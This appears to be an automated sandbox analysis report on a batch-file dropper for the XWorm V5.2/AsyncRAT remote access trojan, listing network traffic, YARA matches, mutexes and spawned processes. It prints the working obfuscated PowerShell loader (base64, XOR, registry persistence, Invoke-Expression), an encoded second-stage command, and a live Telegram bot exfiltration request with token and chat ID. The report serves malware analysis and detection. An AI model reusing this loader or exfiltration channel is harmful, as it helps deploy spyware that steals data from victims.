                Source: global trafficHTTP traffic detected: GET /bot7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24/sendMessage?chat_id=8080837794&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD7AEA3DBB334FF534DC1%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LHX9B%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: unknownTCP traffic detected without corresponding DNS query: 193.32.177.63
                Source: global trafficHTTP traffic detected: GET /bot7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24/sendMessage?chat_id=8080837794&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD7AEA3DBB334FF534DC1%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LHX9B%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.2338047448.0000024300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.00000228154C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.2338047448.0000024300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.00000228154C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24/sendMessage?chat_id=80808
                Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49687 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

                System Summary

                barindex
                Source: amsi64_332.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: 3.2.powershell.exe.24302f3c610.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 3.2.powershell.exe.24302f46890.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: georgefloyd.batStatic file information: 4474706
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHard error raised: shutdownJump to behavior
                Source: amsi64_332.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 3.2.powershell.exe.24302f3c610.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 3.2.powershell.exe.24302f46890.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSchedulerSnapshot.csTask registration methods: 'InternalCreate', 'Create'
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AssemblyLoader.csBase64 encoded string: 'UVAbWFxWR1pGWlNBG0JcWwYHG0FURl5GVl1QUUBZUEcbR1BGWkBHVlBG', 'W08TUFReT1JOUltJE0pUUw4PE0lcTlZOXlVYWUhRWE8TT1hOUkhPXlhO', 'NDgkIyIlNnkxJXk6PjQlOCQ4MSN5ID45ZGV5IzYkPCQ0PzIzIjsyJXklMiQ4IiU0MiR5Mzs7eTQ4OiclMiQkMjM=', 'Jys3MDE2JWotMGopLSc2KzcrIjBqMy0qd3ZqMCU3LzcnLCEgMSghNmo2ITcrMTYnITdqICgoaicrKTQ2ITc3ISA=', 'Jys3MDE2JWouJWopLSc2KzcrIjBqMy0qd3ZqMCU3LzcnLCEgMSghNmo2ITcrMTYnITdqICgoaicrKTQ2ITc3ISA=', 'SUVZXl9YSwRYXwRHQ0lYRVlFTF4EXUNEGRgEXktZQVlJQk9OX0ZPWARYT1lFX1hJT1kETkZGBElFR1pYT1lZT04=', 'PThgIyctPCE9ISg6YDknIH18YDovPSU9LSYrKjsiKzxgPCs9ITs8LSs9', 'NTklIiMkN3giJHg7PzUkOSU5MCJ4IT84ZWR4IjclPSU1PjMyIzozJHgkMyU5IyQ1MyV4Mjo6eDU5OyYkMyUlMzI=', 'W1dLTE1KWRZCUBVbVhZVUVtKV0tXXkwWT1FWCwoWTFlLU0tbUF1cTVRdShZKXUtXTUpbXUsWXFRUFltXVUhKXUtLXVw=', 'IDJ3Mjs0LnQ3MzkoNSk1PC50LTM0aWh0LjspMSk5Mj8+LzY/KHQoPyk1Lyg5Pyk='
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.csBase64 encoded string: 'ICBlaGxpYWh+fi19Ynpof35laGFhI2h1aC0gemRjaWJ6fnl0YWgtZWRpaWhjLSBobi0=', 'TWVid3FzZEs2ZWJ3cXNkNn53ZTZ0c3N4NnBjenpvNnp5d3Jzcg=='
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Settings.csBase64 encoded string: 'WC90e2vpmiam8pDcoIMG1kaztbDVLq5uoy9zc6lnsHeiDFVidWVI+kgo7tAch24i'
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Settings.csBase64 encoded string: 'WC90e2vpmiam8pDcoIMG1kaztbDVLq5uoy9zc6lnsHeiDFVidWVI+kgo7tAch24i'
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Botkiller.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winBAT@6/10@1/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\wwD0bshguVCRSd3k
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okd4b1um.ppc.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
